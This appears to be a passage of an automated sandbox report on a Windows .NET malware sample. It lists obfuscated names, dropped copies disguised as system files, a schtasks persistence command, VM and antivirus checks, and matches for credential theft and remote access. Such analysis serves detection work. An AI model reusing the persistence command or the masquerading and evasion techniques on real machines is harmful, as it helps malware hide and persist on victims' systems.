            Source: oFAjWuoHBq.exe, tw1lMX1ISP6v2lImnvH.cs High entropy of concatenated method names: 'PJ1', 'jo3', 'tuTU45Pant', 'MfpUYXbjOd', 'LTWUu9C5uT', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: oFAjWuoHBq.exe, YNnXtZCRWFDgJsq3uug.cs High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'Vs66F7NyXBVhhVS0DJN', 'nMZBKhNQCEwlLPWkchC', 'FGq7OfNnNNxWtbaVsbL', 'sWWZefN1jZHTtjH8GqW', 'aiiBOQNWH7B5l1vvFMv', 'lh1CwJN6UqAZjPpp92E'
            Source: oFAjWuoHBq.exe, z1hBwRoMX2RaWkbpuFH.cs High entropy of concatenated method names: '_223', 'cfmtF1vBo6pLGVTq009', 'xNjX8jv2U7p81u4r8iE', 'agRWSVvAcJmkRcRfrl1', 'Lx9Q0Uv86gF0dijfrHm', 'hglrmsvvQoenG9UIQVx', 'rN9UJjvbx5HKhkwWeMD', 'YHq7bxvM6u8tdgLIjiC', 'MSE92Iv4sc9hV1SJ1nN', 'k8kxAbvkWNQZSn22LhA'
            Source: oFAjWuoHBq.exe, MhP2thWtdkESSpFc27n.cs High entropy of concatenated method names: 'cvH1b8VbgD', 'QIC14md3ri', 'AETEVbBxWaPnrapQNly', 'Tye85QBTo1tj4DVKP4j', 'cY45sEB6iGOaxppISao', 'qTYY5aBKZnBsHNjkbK9', 'mb61g9wsYa', 'zaijv02EaRpfP0u058D', 'Q7Anrg2DfNtn8GIkPGD', 'AoYLJHBLJxgOivoAEFp'
            Source: oFAjWuoHBq.exe, kBrrfDflTtud1YgX5GF.cs High entropy of concatenated method names: 'IMsZXmIh3QeEMnCKllD', 'En62vlIm48u7hpJRN2x', 'JtSQ1rIp7NwHFTAvs2X', 'IsXqGvIRYeGPVB9jcOo', 'GEnJrGIGQvhikk9Lhqj', 'uTdq8pINo0YVb0Zsoaf', 'AbCmTSISHw6CVrpHGRZ'
            Source: oFAjWuoHBq.exe, PTyvMV6V1Eswo16bST.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'lIDQQHXcNSqLdkaeAps', 'OhCvZYXLZWJIfVbnheF', 'P5YqQxXzkmQlBFqueoE', 'MHFNFVpEfrKoLkshZxg', 'y1GFN3pDgNu0mRrUBlO', 'UgYWPjpXM57RnRKqKcG'
            Source: oFAjWuoHBq.exe, XTd0rLoTv41DkMqoBIY.cs High entropy of concatenated method names: 'oYo', '_1Z5', 'sXSIool5q8', 'oQ2Yy8Smnm', 'r8YINUg6D9', 'LMIn354tvIukqAp6tRl', 'qBPUTs4g7qqYamiTp1k', 'pmbv60490sXpuIb9gKy', 'sw6M7K4d0plCT3jljQ9', 'V5D2Q14fVnoDhq2tpxq'
            Source: oFAjWuoHBq.exe, JJmQaxCpfAKCpS000WB.cs High entropy of concatenated method names: 'pqPCKBwm9j', 'e5WcLYskw7VbZ6bIEQ9', 'lQ8AlSsV6IJwuUIPE2d', 'UxHulKsMS6a7rjh1RK4', 'yBgrTAs4XQ5fDDWGl29', 'KEW1AfsODHDm8RyCcF7', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: oFAjWuoHBq.exe, Fp6jV7oIefceMgqQwwc.cs High entropy of concatenated method names: '_5u9', 'hj6IPEjjQw', 'XEOYFsU3Ik', 'cf4I0cBbL6', 'yNbNkPMHwmNWxCQmrlP', 'qKyJQ1McMaabCTaYRtn', 'qN7UFZMLapj6Baq9t5y', 'b4BCPGMxqod1tGV3xUw', 'MRXSKMMT6LZBTVU50fC', 'rpbdiAMzyUBAhdNH5qK'
            Source: oFAjWuoHBq.exe, beWCLsCJbdIw88JXIMD.cs High entropy of concatenated method names: 'OqxCUmhLMK', 'jd1veMNBLl8FyUYwAGM', 'owtXbQN20ARQximHxnL', 'SdexPLNdRvtwBpXxASV', 'YqWtAUNfIvyYT6OhZ86', 'TYcA5BNAb9024skFOKM', 'AhqVhpN8LwiqpE1FeGy', 'kb5DvVNvcuoDt99QYpM', 'jBKdawNbFnlCXodldUk', 'f28'
            Source: oFAjWuoHBq.exe, SvH61X176uYX1ShoZb7.cs High entropy of concatenated method names: 'GmsH2S12D9', 'GrECJNCal72QAHrjj2p', 'ekBvBfCUjTkjt3qMqyu', 'kMRG4lCPvopF6K0fQR7', 's4xfakCJl2qAhhWEomW', '_1fi', 'OT3sODYavF', '_676', 'IG9', 'mdP'

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File written: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File created: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File created: C:\Users\Public\AccountPictures\Registry.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File created: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File created: C:\Users\user\StartMenuExperienceHost.exe

            Boot Survival

            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe File created: C:\Users\user\StartMenuExperienceHost.exe
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\AccountPictures\Registry.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\StartMenuExperienceHost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Memory allocated: C90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Memory allocated: 1ABC0000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Memory allocated: 2D70000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Memory allocated: 1AEC0000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Memory allocated: 17F0000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Memory allocated: 1B460000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Memory allocated: 8B0000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Memory allocated: 1A550000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exe | Memory allocated: 1530000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exe | Memory allocated: 1AEA0000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exe | Memory allocated: E60000 memory reserve | memory write watch
            Source: C:\Users\Public\AccountPictures\Registry.exe | Memory allocated: 1AA00000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exe | Memory allocated: D60000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exe | Memory allocated: 1AAA0000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exe | Memory allocated: 11F0000 memory reserve | memory write watch
            Source: C:\Users\user\StartMenuExperienceHost.exe | Memory allocated: 1AF00000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Memory allocated: 1620000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Memory allocated: 1B310000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Memory allocated: 10B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Memory allocated: 1AB70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 599687
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 599578
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 599468
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 599359
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\Public\AccountPictures\Registry.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Window / User API: threadDelayed 812
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | Window / User API: threadDelayed 1373
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Window / User API: threadDelayed 745
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Window / User API: threadDelayed 1551
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Window / User API: threadDelayed 367
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | Window / User API: threadDelayed 365
            Source: C:\Users\Public\AccountPictures\Registry.exe | Window / User API: threadDelayed 367
            Source: C:\Users\Public\AccountPictures\Registry.exe | Window / User API: threadDelayed 366
            Source: C:\Users\user\StartMenuExperienceHost.exe | Window / User API: threadDelayed 367
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Window / User API: threadDelayed 366
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | Window / User API: threadDelayed 369
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe TID: 2788 | Thread sleep count: 812 > 30
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe TID: 2788 | Thread sleep count: 1373 > 30
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe TID: 4440 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 6616 | Thread sleep count: 745 > 30
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 6616 | Thread sleep count: 1551 > 30
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416 | Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416 | Thread sleep time: -599687s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416 | Thread sleep time: -599578s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416 | Thread sleep time: -599468s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7416 | Thread sleep time: -599359s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7224 | Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 4396 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 764 | Thread sleep count: 367 > 30
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 6504 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 1120 | Thread sleep count: 365 > 30
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 5768 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 7316 | Thread sleep count: 367 > 30
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 7176 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 7180 | Thread sleep count: 366 > 30
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 5064 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 7376 | Thread sleep count: 367 > 30
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 1472 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 7408 | Thread sleep count: 173 > 30
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 7408 | Thread sleep count: 200 > 30
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 360 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7368 | Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7252 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7388 | Thread sleep count: 369 > 30
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7248 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Public\AccountPictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599687Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599578Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599468Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599359Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\AccountPictures\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477
            Source: oFAjWuoHBq.exe, 00000000.00000002.2054737738.000000001BE28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\6
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2104816265.000000001BFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess token adjusted: Debug
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess token adjusted: Debug
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe" Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeQueries volume information: C:\Users\user\Desktop\oFAjWuoHBq.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeQueries volume information: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeQueries volume information: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeQueries volume information: C:\Users\Public\AccountPictures\Registry.exe VolumeInformation
            Source: C:\Users\Public\AccountPictures\Registry.exeQueries volume information: C:\Users\Public\AccountPictures\Registry.exe VolumeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeQueries volume information: C:\Users\user\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeQueries volume information: C:\Users\user\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe VolumeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe VolumeInformation
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2084176737.000000000127B000.00000004.00000020.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2104816265.000000001BFAA000.00000004.00000020.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2084176737.00000000012F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2148302161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2148302161.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.2143381456.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2132989514.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2152498750.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.2140699573.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.2153356357.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2085969443.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.2151848592.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: oFAjWuoHBq.exe PID: 1372, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 3168, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 7152, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 6128, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Registry.exe PID: 5612, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Registry.exe PID: 6544, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5752, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5436, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 6596, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 2272, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2148302161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2148302161.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
